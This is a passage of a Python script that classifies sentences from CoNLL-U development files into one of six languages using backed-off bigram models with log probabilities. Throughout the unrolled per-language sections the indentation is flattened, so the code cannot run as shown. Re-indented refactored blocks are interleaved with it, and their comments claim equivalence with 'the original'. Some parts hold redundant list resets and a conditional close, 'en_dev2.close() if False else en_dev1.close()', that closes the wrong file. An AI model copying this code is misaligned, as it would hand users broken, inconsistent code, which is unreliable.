#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang1')
countDevLang1+=1
#print("Done with %d sentences in dev set for Lang 1\n"%(countDevLang1))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
#clear the shared per-sentence word buffers before moving on to the next dev
#file (a generator expression yields six *distinct* empty lists)
tempSentence1, tempSentence2, tempSentence3, tempSentence4, tempSentence5, tempSentence6 = ([] for _ in range(6))
en_dev2.close() if False else en_dev1.close()
#connlu parse each dev-set sentence of the Lang2 file and score it against all
#six bigram language models using Katz-style backoff, then predict the language.
#The six per-language model tables are gathered into one list so the scoring
#logic is written once instead of being copy-pasted six times; the math is
#unchanged: p(y|x) = (c(x,y)-d2)/c(x) when the bigram is known, otherwise
#a(x) * c(y)/N when the unigram is known, otherwise a(x) * b/V of the mass
#reserved for redistribution.
langModels = [
    ("Lang1", backedOffBigram1, series1, backedOffList1, redistributedBigram1,
     wordCount1, redistributedUnigram1, sizeOfVocab1, probLang1),
    ("Lang2", backedOffBigram2, series2, backedOffList2, redistributedBigram2,
     wordCount2, redistributedUnigram2, sizeOfVocab2, probLang2),
    ("Lang3", backedOffBigram3, series3, backedOffList3, redistributedBigram3,
     wordCount3, redistributedUnigram3, sizeOfVocab3, probLang3),
    ("Lang4", backedOffBigram4, series4, backedOffList4, redistributedBigram4,
     wordCount4, redistributedUnigram4, sizeOfVocab4, probLang4),
    ("Lang5", backedOffBigram5, series5, backedOffList5, redistributedBigram5,
     wordCount5, redistributedUnigram5, sizeOfVocab5, probLang5),
    ("Lang6", backedOffBigram6, series6, backedOffList6, redistributedBigram6,
     wordCount6, redistributedUnigram6, sizeOfVocab6, probLang6),
]
for tokenlist in parse_incr(en_dev2):
    #lower-cased token forms wrapped in sentence boundary markers; the original
    #built six identical copies of this list (one per language) -- one suffices
    sentence = ["<BOS>"] + [token["form"].lower() for token in tokenlist] + ["<EOS>"]
    #materialize the bigram pairs once so every language model can iterate them
    sentenceBigrams = list(zip(sentence, islice(sentence, 1, None)))
    #log posterior numerator per language, keyed "Lang1".."Lang6" in order so
    #max() tie-breaking matches the original unrolled code
    probDict = {}
    for (langName, bigramCounts, unigramSeries, unigramCounts, alphaTable,
         totalWordCount, reservedUnigramMass, vocabSize, langPrior) in langModels:
        #this is math.log(1) since log probabilities are summed to avoid
        #multiplication underflow
        logProbSentence = 0
        #bigrams that backed off past the unigram level; their probability
        #mass can only be assigned after the number of OOV types is known
        doubleBackoff = {}
        for wordPair in sentenceBigrams:
            if wordPair in bigramCounts:
                #c(x,y) > 0: discounted bigram estimate (c(x,y)-d2) / c(x)
                logProbSentence += math.log(bigramCounts[wordPair] / unigramSeries[wordPair[0]])
            elif wordPair[1] in unigramCounts:
                #c(x) > 0: back off to the unigram, a(x) * (c(y) / N)
                if wordPair[0] in alphaTable:
                    alpha = alphaTable[wordPair[0]]
                else:
                    alpha = alphaTable['<UNK>']
                logProbSentence += math.log(alpha * (unigramCounts[wordPair[1]] / totalWordCount))
            else:
                #double backoff: tally the pair for later mass redistribution
                if wordPair in doubleBackoff:
                    doubleBackoff[wordPair] += 1
                else:
                    doubleBackoff[wordPair] = 1
        #b/V where b is the reserved probability mass and V is the size of the
        #known vocabulary plus the newly encountered OOV types in this sentence
        distValueUnigram = reservedUnigramMass / (len(doubleBackoff) + vocabSize)
        #add a(x) * b/V in log space once per occurrence of each double-backed-off pair
        for pair, count in doubleBackoff.items():
            if pair[0] in alphaTable:
                alpha = alphaTable[pair[0]]
            else:
                alpha = alphaTable['<UNK>']
            logProbSentence += count * math.log(alpha * distValueUnigram)
        #Bayes numerator in log space: log p(sentence|lang) + log p(lang)
        probDict[langName] = logProbSentence + math.log(langPrior)
    #the language with the maximum log likelihood is the prediction
    Keymax = max(probDict, key=probDict.get)
    predictedLang.append(str(Keymax))
    #this dev file is known to be Lang2
    actualLang.append('Lang2')
    countDevLang2 += 1
#keep the shared per-sentence buffers defined and empty for the next dev file
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev2.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev3):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang3')
countDevLang3+=1
#print("Done with %d sentences in dev set for Lang 3\n"%(countDevLang3))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev3.close()
#conllu-parse the Lang4 dev set and classify every sentence against the six
#backed-off bigram language models built earlier in this script.
#
#The original code repeated the identical scoring logic six times (once per
#language) over numbered variables; it is factored here into one helper
#applied to a table of per-language model parameters.  Numerical behavior is
#unchanged: log-probabilities are accumulated in the same order (bigram /
#first-backoff terms in sentence order, then the double-backoff
#redistribution terms in first-seen order).

def _dev4SentenceLogProb(sentence, bigramCounts, contextCounts, unigramCounts,
                         backoffWeights, totalTokens, reservedMass, vocabSize):
    """Return log P(sentence | language) under the two-level backoff model.

    sentence       -- token list already wrapped in <BOS>/<EOS>
    bigramCounts   -- discounted bigram counts, c(x,y) - d2
    contextCounts  -- unigram counts c(x) used to normalize seen bigrams
    unigramCounts  -- unigram counts c(y) for the first backoff level
    backoffWeights -- a(x) backoff weights, with an '<UNK>' fallback entry
    totalTokens    -- sum of c(v) over the whole vocabulary
    reservedMass   -- probability mass b set aside for unseen events
    vocabSize      -- vocabulary size V
    """
    #this is math.log(1) since log probabilities are added, not multiplied
    logProb = 0.0
    #bigrams that backed off twice: pair -> occurrence count in this sentence
    doubleBackoff = {}
    for pair in zip(sentence, sentence[1:]):
        if pair in bigramCounts:
            #c(x,y) > 0: probability is (c(x,y) - d2) / c(x)
            logProb += math.log(bigramCounts[pair] / contextCounts[pair[0]])
        elif pair[1] in unigramCounts:
            #back off once: a(x) * (c(y) / summation of c(v) across all V)
            if pair[0] in backoffWeights:
                weight = backoffWeights[pair[0]]
            else:
                weight = backoffWeights['<UNK>']
            logProb += math.log(weight * (unigramCounts[pair[1]] / totalTokens))
        else:
            #backed off twice: tally now, redistribute reserved mass below
            if pair in doubleBackoff:
                doubleBackoff[pair] += 1
            else:
                doubleBackoff[pair] = 1
    #b / (V + number of newly encountered types), shared across all doubly
    #backed-off pairs of this sentence
    distValue = reservedMass / (len(doubleBackoff) + vocabSize)
    for pair, count in doubleBackoff.items():
        if pair[0] in backoffWeights:
            weight = backoffWeights[pair[0]]
        else:
            weight = backoffWeights['<UNK>']
        logProb += count * math.log(weight * distValue)
    return logProb

#one tuple of model parameters per language, in Lang1..Lang6 order
_dev4Models = [
    (backedOffBigram1, series1, backedOffList1, redistributedBigram1,
     wordCount1, redistributedUnigram1, sizeOfVocab1, probLang1),
    (backedOffBigram2, series2, backedOffList2, redistributedBigram2,
     wordCount2, redistributedUnigram2, sizeOfVocab2, probLang2),
    (backedOffBigram3, series3, backedOffList3, redistributedBigram3,
     wordCount3, redistributedUnigram3, sizeOfVocab3, probLang3),
    (backedOffBigram4, series4, backedOffList4, redistributedBigram4,
     wordCount4, redistributedUnigram4, sizeOfVocab4, probLang4),
    (backedOffBigram5, series5, backedOffList5, redistributedBigram5,
     wordCount5, redistributedUnigram5, sizeOfVocab5, probLang5),
    (backedOffBigram6, series6, backedOffList6, redistributedBigram6,
     wordCount6, redistributedUnigram6, sizeOfVocab6, probLang6),
]

for tokenlist in parse_incr(en_dev4):
    #lower-case as preprocessing: words of different case but same spelling
    #are the same type for these purposes.  The original built six identical
    #copies of this list (one per language); one shared sentence is
    #equivalent since every copy received exactly the same tokens.
    sentence = ["<BOS>"] + [token["form"].lower() for token in tokenlist] + ["<EOS>"]
    #store log P(sentence | L_i) + log P(L_i) per language, keyed by name
    probDict = {}
    for idx, model in enumerate(_dev4Models, start=1):
        params, prior = model[:7], model[7]
        probDict["Lang%d" % idx] = (_dev4SentenceLogProb(sentence, *params)
                                    + math.log(prior))
    #find maximum of these log likelihoods and set that as the predicted language
    Keymax = max(probDict, key=probDict.get)
    predictedLang.append(str(Keymax))
    #append the actual language this dev set is from to actual language list
    actualLang.append('Lang4')
    countDevLang4 += 1
    #print("Done with %d sentences in dev set for Lang 4\n"%(countDevLang4))
#resetting the temporary per-sentence scratch lists for the next dev set,
#exactly as the original code did after this loop
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev4.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev5):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
